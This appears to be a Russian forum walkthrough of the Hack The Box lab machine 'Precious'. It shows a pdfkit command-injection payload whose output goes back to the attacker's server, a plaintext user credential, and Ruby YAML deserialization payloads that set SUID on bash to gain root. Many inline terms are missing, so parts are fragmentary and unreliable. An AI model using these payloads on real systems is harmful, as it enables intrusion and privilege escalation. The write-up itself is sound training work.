Приветствую, уважаемые читатели форума
! Сегодня мы пройдём, как мне кажется, самую лёгкую машину на
, которая на данный момент вознаграждается поинтами.
Разведка
Начнём с того , что просканируем порты. Используем флаг
, чтобы использовать стандартные скрипты,
, чтобы определить сервисы открытых портов и
, чтобы использовать
сканирование на основе полуоткрытых соединений (для этого мы также запускаем nmap с правами суперпользователя):
У нас есть типичный для CTF порт
, который мы скорее всего будем использовать, когда уже получим данные пользователя/рута. И
порт - на нём, как правило, располагается веб-сервер.
Переходим на
:
Нас тут же редиректит на домен
. Следовательно, чтобы получить доступ к сайту нам нужно настроить
(подробнее про файл
Вы можете прочитать тут). Внести туда имя домена и
-адрес машины. Для этого открываем данный файл в консольном редакторе
с правами суперпользователя:
Bash:
Код:
sudo
nano
/etc/hosts
И вносим туда следующую строку:
Код:
Код:
10.10.11.189 precious.htb
Теперь переходим на
:
На сайте мы можем сконвертировать любую веб-страницу в
-файл. Я пробовал эксплуатировать
Код:
OS Command Injection
,
,
и
, предполагая, что на бэкэнде используются опасные функции, - ничего не вышло:
Давайте запустим веб-сервер пайтона, чтобы проверить, может ли сервер отправлять свои запросы на нашу рабочую машину:
Bash:
Код:
python3 -m http.server
Теперь вводим наш локальный
-адрес в поле ввода на главной странице
:
После отправки запроса веб-сайт предлагает нам скачать
-файл, в котором располагается содержимое ссылки (мы её указали в форме):
Мы можем заставить веб-сервер атакуемой машины отправить
-запрос на наш веб-сервер, вот только особой выгоды с этого не получить:
Что насчёт самих
-файлов? Очевидно, что на сервере есть автоматизированный инструмент, который их генерирует. Есть вероятность того, что его название и версия указаны в метаданных файла. Проверим файл с помощью
:
Видим следующую строку:
Код:
Creator: Generated by pdfkit v0.8.6
То есть используется
версии
. Давайте поищем в гугле возможные уязвимости на данный софт:
Становится понятно, что это и есть ключ к взлому. В
версии
есть
. Данная уязвимость позволяет нам выполнять любые команды от лица пользователя веб-сервера. Теперь давайте разберёмся с эксплуатацией.
На security.snyk.io мы можем найти
Код:
PoC (Proof Of Concept)
уязвимости:
Так как мы передаём данные через
-параметр
, следовательно, в него нам и нужно класть пэйлоад:
Согласно
и описанию уязвимости, нам требуется использовать следующий пэйлоад:
Код:
Код:
http://10.10.16.52/?name=%20``
Будем использовать
, но можно также использовать и сам
. Используем опцию
, чтобы указать, что будет
-запрос и опцию
, чтобы указать
-параметр
:
Bash:
Код:
curl
"http://precious.htb/"
-X POST --data-raw
"url=http://10.10.16.52/?name=%20`whoami`"
Не забудьте закодировать пэйлоад
-параметра в
-энкод:
Bash:
Код:
curl
"http://precious.htb/"
-X POST --data-raw
"url=http%3A%2F%2F10.10.16.52%2F%3Fname%3D%2520%60whoami%60"
Нам также требуется поднять наш веб-сервер, куда будут приходить
-запросы (которые содержат результат отработки пэйлоада) с атакуемой машины. Я запустил веб-сервер пайтона с правами суперпользователя, чтобы он работал на
порту. После того, как мы его запустили, отправляем наш пэйлоад. Как можно заметить,
отправляет нам запрос с результатом работы пэйлоада в
-параметре
:
Скорее всего бэкэнд веб-сервера написан на
, так как его пользователь -
. Когда мы убедились в том, что
действительно работает, давайте организуем себе реверс шелл. Крайне рекомендую сервис Online - Reverse Shell Generator. Достаточно вбить
-адрес и порт машины, куда придёт реверс-шелл, чтобы получить готовый пэйлоад:
Мы знаем, что на сервере используется
, следовательно, логичнее всего использовать реверс шелл через данный язык программирования. Копируем то, что выдал нам
Код:
Reverse Shell Generator
и кладём это в место, которое предназначено для пэйлоада:
Код:
Код:
http://10.10.16.52/?name=%20``
Конечно же, перед этим ставим листенер, например, на
порт:
Bash:
Делаем
-энкод значения
-параметра
и отправляем запрос:
Отлично, мы залетели на машину. Теперь нам нужно повысить привилегии и получить пользователя.
Взятие пользователя
Немного перебрав различных конфигов, я нашёл скрытый каталог
в домашней директории пользователя
. В нем есть файл
. Читаем файл - получаем данные пользователя
:
Код:
henry:Q3c1AqGHtoI0aXAYFH
Подключаемся по
к
:
Bash:
Код:
ssh
henry@precious.htb
Теперь можем забирать флаг пользователя -
.
Взятие суперпользователя
Используем
, чтобы узнать, что мы можем запустить от лица суперпользователя:
Мы можем запустить следующую команду при этом использовав пароль от
:
Bash:
Код:
sudo
/usr/bin/ruby /opt/update_dependencies.rb
Давайте глянем, что у нас в файле
Код:
/opt/update_dependencies.rb
. Там следующий код:
Ruby:
Код:
# Compare installed dependencies with those specified in "dependencies.yml"
require
"yaml"
require
'rubygems'
# TODO: update versions automatically
def
update_gems
(
)
end
def
list_from_file
YAML
.
load
(
File
.
read
(
"dependencies.yml"
)
)
end
def
list_local_gems
Gem
:
:
Specification
.
sort_by
{
|
g
|
[
g
.
name
.
downcase
,
g
.
version
]
}
.
map
{
|
g
|
[
g
.
name
,
g
.
version
.
to_s
]
}
end
gems_file
=
list_from_file
gems_local
=
list_local_gems
gems_file
.
each
do
|
file_name
,
file_version
|
gems_local
.
each
do
|
local_name
,
local_version
|
if
(
file_name
==
local_name
)
if
(
file_version
!=
local_version
)
puts
"Installed version differs from the one specified in file: "
+
local_name
else
puts
"Installed version is equals to the one specified in file: "
+
local_name
end
end
end
end
В гугле мы можем найти множество источников про атаку десериализации
(
Код:
YAML Deserialization Attack
). В данном случае она эксплуатируется через
. Я нашел следующую статью, где эксплуатируется похожий код с
- Ruby Vulnerabilities: Exploiting Open, Send, and Deserialization…. Мы можем проверить пэйлоад из статьи:
YAML:
Код:
:payload
:
-
!ruby/class
'Gem::SpecFetcher'
-
!ruby/class
'Gem::Installer'
-
!ruby/object:Gem::Requirement
requirements
:
!ruby/object:Gem::Package::TarReader
io
:
!ruby/object:Net::BufferedIO
io
:
!ruby/object:Gem::Package::TarReader::Entry
read
:
0
header
:
aaa
debug_output
:
!ruby/object:Net::WriteAdapter
socket
:
!ruby/object:Gem::RequestSet
sets
:
!ruby/object:Net::WriteAdapter
socket
:
!ruby/module
'Kernel'
method_id
:
:
system
git_set
:
date
>
>
/tmp/rce9b.txt
method_id
:
:
resolve
Создаём файл
в каталоге
и просто копируем туда содержимое пэйлоада. Затем запускаем скрипт
Код:
update_dependencies.rb
с помощью прав суперпользователя и интерпретатора
:
Пэйлоад предполагает то, что после его отработки создастся файл
с владельцем и группой файла
:
Всё пошло по правильному сценарию. Следовательно, в
-файле нам нужно класть пэйлоад в
:
YAML:
Код:
:payload
:
-
!ruby/class
'Gem::SpecFetcher'
-
!ruby/class
'Gem::Installer'
-
!ruby/object:Gem::Requirement
requirements
:
!ruby/object:Gem::Package::TarReader
io
:
!ruby/object:Net::BufferedIO
io
:
!ruby/object:Gem::Package::TarReader::Entry
read
:
0
header
:
aaa
debug_output
:
!ruby/object:Net::WriteAdapter
socket
:
!ruby/object:Gem::RequestSet
sets
:
!ruby/object:Net::WriteAdapter
socket
:
!ruby/module
'Kernel'
method_id
:
:
system
git_set
:
method_id
:
:
resolve
Теперь нужно подумать, как нам взять рута. В целом, мы можем просто скопировать флаг
в
с помощью следующего пэйлоада:
YAML:
Код:
:payload
:
-
!ruby/class
'Gem::SpecFetcher'
-
!ruby/class
'Gem::Installer'
-
!ruby/object:Gem::Requirement
requirements
:
!ruby/object:Gem::Package::TarReader
io
:
!ruby/object:Net::BufferedIO
io
:
!ruby/object:Gem::Package::TarReader::Entry
read
:
0
header
:
aaa
debug_output
:
!ruby/object:Net::WriteAdapter
socket
:
!ruby/object:Gem::RequestSet
sets
:
!ruby/object:Net::WriteAdapter
socket
:
!ruby/module
'Kernel'
method_id
:
:
system
git_set
:
cp /root/root.txt /tmp/; chmod 777 /tmp/root.txt
method_id
:
:
resolve
Но в таком случае мы не получим полноценный
-доступ. Можем выставить
-бит на
, чтобы запустить командную оболочку
от имени пользователя
(подробнее про
-биты Вы можете прочитать тут).
Приводим
-файл к следующему виду:
YAML:
Код:
:payload
:
-
!ruby/class
'Gem::SpecFetcher'
-
!ruby/class
'Gem::Installer'
-
!ruby/object:Gem::Requirement
requirements
:
!ruby/object:Gem::Package::TarReader
io
:
!ruby/object:Net::BufferedIO
io
:
!ruby/object:Gem::Package::TarReader::Entry
read
:
0
header
:
aaa
debug_output
:
!ruby/object:Net::WriteAdapter
socket
:
!ruby/object:Gem::RequestSet
sets
:
!ruby/object:Net::WriteAdapter
socket
:
!ruby/module
'Kernel'
method_id
:
:
system
git_set
:
chmod u+s /bin/bash
method_id
:
:
resolve
И запускаем
-скрипт с правами суперпользователя:
Теперь запускаем
с опцией
, чтобы запустить командную оболочку от лица пользователя
. Про то, как повышать привилегии с помощью программ, которые имеют
-бит, Вы можете ознакомиться на GTFOBins:
Теперь мы с чувством выполненного долга можем прочитать
:
Друзья, большое спасибо, что прочитали данную статью. Пожалуйста, укажите в комментариях, если я допустил какие-либо ошибки или есть какие-нибудь неточности
Линейный вид
